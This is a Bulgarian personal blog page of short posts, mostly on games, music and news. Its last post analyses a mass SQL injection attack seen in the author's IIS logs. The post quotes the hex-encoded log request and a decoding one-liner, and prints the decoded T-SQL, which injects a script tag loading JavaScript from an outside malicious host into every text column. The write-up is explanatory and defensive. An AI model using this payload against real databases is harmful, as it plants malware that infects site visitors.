Blog 1.0

Математиката в мултиплейър-а

Gamasutra – Features – “Multiplayer Math” [08.29.97]

??ма-няма, и от време на време се появяват интересни статии в Gamasutra. Не че останалите не са, но за лаици като мен имат значение тези написани като за 6-годи??ни.

След като на едно от последните ми интервюта (второто май) има??е въпрос за техники за елиминиране на лага в онлайна игрите, си дадох сметка, че нямам никаква идея за какво иде реч (освен общата култура). Още няколко подобни текста си струват усилието да се прочетат.

Късно есено

Darwin @ Home

Хипнотизиращо даже.

[Darwin @ Home]

The new black

Inner Party System е новото черно!
(бляк, гаден израз, но факт)

Inner Party System

Eclective Method “Dont Stop” Mash Up

Weezer – Greatest man that ever lived

’nuff said

Gordon Freeman Is Back

Днес ще пуснат Големия адронов ускорител @ CERN.

?? още нещо – Gordon Freeman е забелзан около ускорителя.
Gordon Freeman @ Cern

USA нападнали Пакистан

Това вече минава границата на пародията.
Наглост до дупка. И овчедушие също.

RATM @ RNC – A Capella

Последната мода в SQL injection атаките

Прекъсвам малко отпуската на блога, за да споделя опита с последната мода в SQL Injection атаките.
(конкретния пример е за MSSQL Server 2005 и IIS уеб-сървър)
В IIS лога би трябвало да имам нещо такова :

2008-08-28 00:00:41 GET /URL.aspx?<ва??ите -си-параметри>;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x44454..<махнато>..%20AS%20CHAR(4000));EXEC(@S); – 61.152.106.142 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1;+InfoPath.1) – 302 392

След като прочетете ??естнайсетичниа код ето така :

echo “<тук-вкарайте-всичко след 0x...>” | perl -pe ‘s/(..)/chr(hex($1))/ge’

излиза това :

DECLARE @T varchar(255),@C varchar(4000)

DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)

OPEN Table_Cursor

FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN
exec(‘update [‘+@T+’] set [‘+@C+’]=””></title><script src=”http://www0.douhunqn.cn/csrss/w.js”></script><!–”+[‘+@C+’] where ‘+@C+’ not like ”%”></title><script src=”http://www0.douhunqn.cn/csrss/w.js”></script><!–”’)
FETCH NEXT FROM Table_Cursor INTO @T,@C
END

CLOSE Table_Cursor

DEALLOCATE Table_Cursor

(разкрасил съм го малко, за да стане по-четлив)

Интересна е хронологията на на атаката, защото преди известно време (в моя случай около май) е имало още един подобен request, който е целял единствено да провери дали сървъра ще отговори за определено време – 20 секудни. Така се набелязват сървърите, които след това се атакуват.

Дали са станали страхливи хакерите или прост ни дават един още един шанс за защита…